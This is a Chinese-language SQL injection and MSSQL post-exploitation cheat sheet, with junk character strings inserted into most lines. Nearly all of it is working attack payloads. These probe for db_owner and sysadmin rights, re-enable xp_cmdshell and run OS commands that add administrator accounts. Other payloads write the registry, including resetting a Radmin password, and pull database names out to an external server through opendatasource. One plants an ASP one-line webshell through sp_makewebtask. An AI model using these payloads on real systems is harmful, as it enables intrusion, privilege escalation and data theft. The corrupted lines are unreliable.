//看看是什么权限的: u" ?: u2 K7 P& k! G! w
and 1=(Select IS_MEMBER('db_owner'))
( G4 o; C: c kAnd char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--
$ F% ^) U' C8 G4 c, H( n: H7 B" L8 o
//检测是否有读取某数据库的权限
9 y: N4 i1 x( yand 1= (Select HAS_DBACCESS('master'))7 h! ]7 M/ @3 u: ^3 @. T3 h
And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 -- c/ K+ {0 b( L# k `0 y
7 ?; f! i" D: p6 t* q9 D
! t" E0 K+ {+ m' j k6 h数字类型
) t6 O/ I$ s! w1 Land char(124)%2Buser%2Bchar(124)=0
0 |# \+ t% L3 x% n5 H: T, d" a
! F- v4 a9 ^# ]: _( Q字符类型; s( ]! y% p+ g9 P8 y1 D$ _
' and char(124)%2Buser%2Bchar(124)=0 and ''='
5 N6 E V1 Y% i6 I* C" q- M% I" ^4 a& P/ M4 B! q" ^
搜索类型( [6 r3 X. n( l
' and char(124)%2Buser%2Bchar(124)=0 and '%'='1 H/ {5 V- ~$ g# H% T) V
& S: M* b2 F9 i' g8 A
爆用户名
- I0 y8 p9 ], pand user>0
! w5 J" |7 H/ F$ }' and user>0 and ''='
S4 @ c. ^& ], O7 h1 ^1 E7 C" T4 a H
检测是否为SA权限/ ?% c/ W8 _% S( O) d5 U0 ]+ G" }$ P
and 1=(select IS_SRVROLEMEMBER('sysadmin'));--* v) \1 T. ~: g" ^0 v* d' z$ ?0 y( R
And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --! q5 b! V1 u2 ]; M1 p% V
O# b2 q: W: }检测是不是MSSQL数据库$ R4 Z. \1 s! s! [ H3 e
and exists (select * from sysobjects);--
2 F+ D* `" Y' o- j1 C
5 ]- U/ ~, B# g5 e1 \" Q. X. o8 c检测是否支持多行+ f% y, V* J6 a( s+ Z
;declare @d int;--
& x3 V: S5 Q6 r
9 r7 L2 D8 k) [/ @# U* {+ i+ i恢复 xp_cmdshell
, @# _& H& |4 L7 M9 w;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--- j3 u5 t7 v' W/ p+ f
0 p, c- n2 m; t9 F y
7 q1 e+ e) l5 W: H6 ?1 R" uselect * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')
! F# B7 z1 t6 {3 q: Q9 H0 Z0 C
1 D$ w$ E9 x) L9 }5 ?% ^1 ~' L4 B//-----------------------; W2 c V0 z$ k
// 执行命令; c7 C1 p5 G0 _8 S: s
//-----------------------
; n5 f5 c0 F: L首先开启沙盘模式:
' j+ G7 f# o$ ~/ N" D# E9 Z3 [1 Vexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',11 l: b+ _( ^2 ^/ C2 a, B) s S1 @
( {0 t5 U* J8 e' q0 ^, ^然后利用jet.oledb执行系统命令
: `3 S. k3 f3 Y! O5 z& `% v5 bselect * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')' S( u- L: A o+ x
$ J3 ]+ U% J( |' o/ k
执行命令
* k; O7 T8 z/ I3 B;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--) o& j# _- n" L% u
B5 c/ l8 m r! h8 R3 z: Y6 {- p/ Y
EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'
: D2 c4 v% N6 F. M
& U4 D5 q6 Y! o5 V判断xp_cmdshell扩展存储过程是否存在:* Z P3 }8 y1 o1 i
http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')
% y6 x% `9 L5 U- R6 n2 R) w/ F. B
. R4 |" y/ H) y) O x写注册表
: L0 J; b9 n! C4 Q$ _" Iexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',11 v% _, P j5 f% s/ k+ M4 e
L$ H7 W$ L% cREG_SZ2 n5 |8 x1 V2 p1 I% N( t6 M% d
/ l! w5 f% a- `, c) T) Y% ~0 {8 X: ]读注册表
, [0 v9 K# o; ]8 h" H* ]exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'7 F+ }- I, T( T( V. [/ E
9 W" y/ v% Y# l5 d* }1 i
读取目录内容
! }4 x, y2 J' n, `/ S1 uexec master..xp_dirtree 'c:\winnt\system32\',1,1
* O `4 T" v) a3 L b! u" c7 j
. W3 w; |+ J; n. o1 W- H$ [5 H! h' b9 a, l! F- c
数据库备份1 E8 E* l% `+ l
backup database pubs to disk = 'c:\123.bak'- `: W! V! Q; {8 o
. S% X/ E9 U4 S- S0 t0 B* m3 K
//爆出长度
% h: r" Q8 [- x j3 k- G+ H1 fAnd (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--) f7 K' u' {. T# W
* N! U% I: G' i5 N
9 f8 `; Z* z- k
. ^: C9 `% A; v/ M; o
更改sa口令方法:用sql综合利用工具连接后,执行命令: [+ w% Y; V) w3 W
exec sp_password NULL,'新密码','sa'+ k0 K, l. R9 l. V
$ z3 o5 ^7 Y) W1 v2 M+ L1 _
添加和删除一个SA权限的用户test:7 W" {$ g1 b; v! O
exec master.dbo.sp_addlogin test,9530772
( [ ?+ w3 [3 j" Z: n9 |exec master.dbo.sp_addsrvrolemember test,sysadmin
# @4 ^" b; u- Q$ l
+ F/ j" d" g0 g( u; e% }8 H删除扩展存储过过程xp_cmdshell的语句:. o7 K$ V( `, \) K, F
exec sp_dropextendedproc 'xp_cmdshell'
) y- m% H" ^1 b1 E$ [
2 A9 c. g. ~1 G+ p( K添加扩展存储过过程$ C6 K+ Y- t" {+ [, S
EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'4 H% ]7 t) w* ~ h. H2 n
GRANT exec On xp_proxiedadata TO public
. X! ~% [, ?* c3 s5 ^
8 E% b$ b* a; u" o3 c s, ~7 s& H3 A8 m3 s/ t
停掉或激活某个服务。
6 y3 N* Z+ D) S" h/ N6 t0 m7 g0 l" t& T; x% x% F
exec master..xp_servicecontrol 'stop','schedule'3 ~+ T# p3 m# b3 v$ U- w
exec master..xp_servicecontrol 'start','schedule'( E- ^! r, y) V/ y7 d$ ]* s
% r; y/ m5 J( G! ]dbo.xp_subdirs
5 M# k$ T) a+ s4 d( u; [2 q( \, _% x
只列某个目录下的子目录。
& i2 I' _+ u6 ?1 S) Xxp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'* A6 e9 A1 s1 @# [0 z7 w) K
4 t: j: C" v' y0 w
dbo.xp_makecab
; r0 q# c: t. L/ X6 A M2 g% O* N2 V+ i+ P
将目标多个档案压缩到某个目标档案之内。; a: X6 Z9 Q; B, H: x
所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。
9 ]1 T3 b3 u! ` { ~- Y- g% w! H: H3 ^4 i5 s1 N6 {
dbo.xp_makecab0 g, w4 f! d4 w* {3 w
'c:\test.cab','mszip',1,
. G1 J& n6 c4 Y( j7 t'C:\Inetpub\wwwroot\SQLInject\login.asp',
% q3 U# a. y$ g) ?" q: d0 s8 g5 ]9 `'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'
4 Z* p$ i( m+ o3 ^/ C
* k1 |% U# @- K& T; Vxp_terminate_process# a" {7 F. R9 [8 I9 U
1 G, d: C5 r+ n3 ]* u! D* O I+ m停掉某个执行中的程序,但赋予的参数是 Process ID。) y" o1 C3 n k- }8 |( ^
利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID9 o7 o" Q0 h& A" Z1 m2 o/ n
+ T/ [: k, z8 N# ]2 d5 e0 U
xp_terminate_process 2484% _/ V, A3 G U$ N4 W0 P
+ z' P) _+ k" b# c; |6 U
xp_unpackcab
0 x5 Y, k5 K; W: k: h1 p$ b: \ o8 o
解开压缩档。9 R; y. Q; b& k" ?
+ O$ _# @" o" J) L f+ C
xp_unpackcab 'c:\test.cab','c:\temp',1
6 `/ U, d3 a# U' y, }, w0 ^
' a8 {/ p* o5 N* ^. ^5 j% k( x. p( {! z: ]
某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234
W4 t( H7 W/ v5 v/ T) }5 N9 ^7 {
2 H f! V# M3 w% L. p7 s% rcreate database lcx;
5 K0 @4 X! S# tCreate TABLE ku(name nvarchar(256) null);) M% J9 T" P; ?' ^# ]( J4 |9 H
Create TABLE biao(id int NULL,name nvarchar(256) null);( M- T: l+ `6 w5 D1 e4 J
* O2 D/ ]. N8 A- s- I/ ^
//得到数据库名
3 D) y6 n! y1 y/ H! }4 _+ ^# k* Yinsert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases5 F- q6 {* ~+ n% E# v
6 F. M8 p$ s' T+ }; U. Z. W, d; r1 F. I/ V
//在Master中创建表,看看权限怎样
5 ?8 }2 g9 W8 H, w% yCreate TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--
$ \! {1 P3 L6 R9 M* a9 _+ ?, E1 k3 k
& D( U+ P2 ~! z. A! u: ~用 sp_makewebtask直接在web目录里写入一句话马:
! ~$ O; V' k/ |% G! f# {http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--, o. N9 Z7 _: Q9 n) }2 C
: Q% t% [ T$ h" F& d- s//更新表内容( v( h$ b. z: K* w; X* H) v& N6 H
Update films SET kind = 'Dramatic' Where id = 123
: I3 a. _1 D4 B; @
w, f, g. `0 r: I& Q$ j) V6 U$ B4 J//删除内容8 r: [" a8 g- [, i2 M0 j5 V, Z
delete from table_name where Stockid = 3 |